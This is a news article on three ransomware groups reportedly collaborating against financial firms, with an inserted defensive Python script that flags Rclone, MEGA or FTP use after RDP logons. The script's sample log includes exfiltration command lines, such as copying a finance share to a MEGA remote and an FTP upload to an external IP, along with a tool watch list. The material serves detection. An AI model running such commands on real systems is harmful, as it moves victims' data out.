Beware: Three Ransomware Groups Team Up to Cause Mayhem
Collaboration among three major ransomware groups, collectively known as the Cyber-Extortion Trinity (BianLian, White Rabbit, and Mario), recently surfaced as they joined forces to target publicly traded financial services companies.
A Rare Phenomenon: Joint Ransomware Attacks
While joint ransomware attacks are not common, the increasing involvement of Initial Access Brokers (IABs) with various Dark Web groups suggests a potential rise in such incidents.
The identification and dismantling of cybercriminal networks by law enforcement may inadvertently encourage collaboration, as displaced members of these groups might be more inclined to cooperate with rivals.
A significant revelation came from Resecurity, Inc. (USA), during a recent Digital Forensics & Incident Response (DFIR) engagement with a law enforcement agency (LEA) and a prominent investment firm in Singapore.
White Rabbit Emerges: Targeting Financial Institutions
White Rabbit, a ransomware family, gained attention after targeting a U.S. bank in December 2021 and subsequently focusing on financial institutions (FIs).
The threat actors behind White Rabbit gave victims only a brief window, typically four to five days, to pay the ransom. Their ransom note not only threatened to report victims to oversight authorities but also warned that failure to pay promptly would expose the business to fines and GDPR enforcement.
Additionally, White Rabbit's ransom notes consistently mentioned the RansomHouse Telegram channel.
BianLian’s Target: Critical Infrastructure Sectors in the U.S.
According to a CISA-ACSC advisory, since June 2022 the cybercriminal group BianLian has been targeting critical infrastructure sectors in the United States, gaining access with legitimate Remote Desktop Protocol (RDP) credentials. The group performs credential harvesting and discovery using open-source tools and command-line scripting, and exfiltrates victim data via FTP, Rclone, or Mega.
Using a double-extortion method, BianLian exfiltrates data, encrypts victim systems, and then threatens to release the stolen data unless a ransom is paid.
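As an added illustration, not from the advisory or from Resecurity's report, the following Python sketch shows how a defender might surface the pattern described above in Windows Security events: an RDP logon (event 4624, logon type 10) followed by execution of Rclone, MEGA tooling or ftp.exe (event 4688) by the same account on the same host. The log lines, hostnames and tool list are constructed, and the two-hour correlation window is an assumption to tune per environment.

```python
import json
from datetime import datetime, timedelta

# Constructed sample events in JSON-lines form, loosely modelled on Windows
# Security log fields (4624 = logon, 4688 = process creation). Not real data.
SAMPLE_LOG = r"""
{"ts":"2023-10-02T01:12:03","host":"FS01","event_id":4624,"logon_type":10,"user":"svc_backup","src_ip":"203.0.113.7"}
{"ts":"2023-10-02T01:14:41","host":"FS01","event_id":4688,"user":"svc_backup","process":"C:\\Tools\\rclone.exe","cmdline":"rclone copy D:\\Finance mega:drop --transfers 8"}
{"ts":"2023-10-02T09:05:00","host":"WS22","event_id":4624,"logon_type":2,"user":"alice","src_ip":"-"}
{"ts":"2023-10-02T09:06:10","host":"WS22","event_id":4688,"user":"alice","process":"C:\\Windows\\System32\\notepad.exe","cmdline":"notepad.exe"}
{"ts":"2023-10-03T22:40:00","host":"DB03","event_id":4688,"user":"dba","process":"C:\\Windows\\System32\\ftp.exe","cmdline":"ftp -s:upload.txt 198.51.100.9"}
"""

EXFIL_TOOLS = {"rclone.exe", "megacmd.exe", "megasync.exe", "ftp.exe"}  # assumed list
EXFIL_KEYWORDS = ("rclone", "mega:", "ftp ")
RDP_LOGON_TYPE = 10           # RemoteInteractive: an RDP / Terminal Services session
WINDOW = timedelta(hours=2)   # assumed correlation window; tune per environment

def parse_events(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1]

def is_exfil_tool(ev):
    cmd = ev.get("cmdline", "").lower()
    return basename(ev.get("process", "")).lower() in EXFIL_TOOLS or \
        any(k in cmd for k in EXFIL_KEYWORDS)

def detect(events):
    """Return alerts for exfil-tool executions; severity is HIGH when the same
    account had an RDP logon on the same host within WINDOW beforehand."""
    rdp_logons = {}   # (host, user) -> time of most recent RDP logon
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(ev["ts"])
        key = (ev["host"], ev["user"])
        if ev["event_id"] == 4624 and ev.get("logon_type") == RDP_LOGON_TYPE:
            rdp_logons[key] = t
        elif ev["event_id"] == 4688 and is_exfil_tool(ev):
            recent = rdp_logons.get(key)
            severity = "HIGH" if recent and t - recent <= WINDOW else "MEDIUM"
            alerts.append({"host": ev["host"], "user": ev["user"],
                           "tool": basename(ev["process"]), "severity": severity})
    return alerts

if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_LOG)):
        print(alert)
```

On the sample data this yields a HIGH alert for the rclone run on FS01 (RDP logon two minutes earlier) and a MEDIUM alert for ftp.exe on DB03 with no preceding RDP logon.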
MarioLocker: Rendering Files Inaccessible
The ransomware variant MarioLocker, known for rendering files inaccessible, was identified on compromised computers. Ransom notes bearing a signature linked to the Mario ransomware consistently referred to the RansomHouse Telegram channel.
The evolving ransomware threat landscape poses a significant challenge for organizations, emphasizing the critical importance of a proactive cybersecurity strategy. Recommendations include regular system updates, robust threat detection systems, and comprehensive employee training to recognize and thwart social engineering attacks.